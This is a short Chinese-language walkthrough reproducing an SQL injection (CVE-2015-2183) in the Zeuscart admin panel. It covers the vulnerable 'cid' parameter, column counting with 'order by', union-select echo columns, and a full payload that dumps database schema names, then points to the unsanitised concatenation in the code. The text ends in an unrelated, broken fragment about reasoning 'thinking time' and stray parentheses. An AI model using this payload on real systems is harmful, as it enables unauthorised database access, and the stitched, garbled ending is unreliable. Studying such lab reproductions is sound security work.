CVE-2015-2183 Zeuscart SQL注入漏洞
主頁
訪問/admin/進行登錄
訪問:http://192.168.1.3/admin/?do=editcurrency&cid=1
單引號測試,發現頁面發生變化,進一步測試
order by 5 ,頁面正常,order by 6時頁面發生變化,說明有五個字段
聯合查詢試試,2和4回顯
查詢當前用戶和版本
查詢當前所用數據庫:cid=1+union+select+1,group_concat(schema_name),3,4,5+from+information_schema.schemata±-+
看一下相關代碼,將cid字段直接拼接到sql語句中
如何通過“思考時間”(即推理時的計算資源)提升推理能力)
)
)
做法!)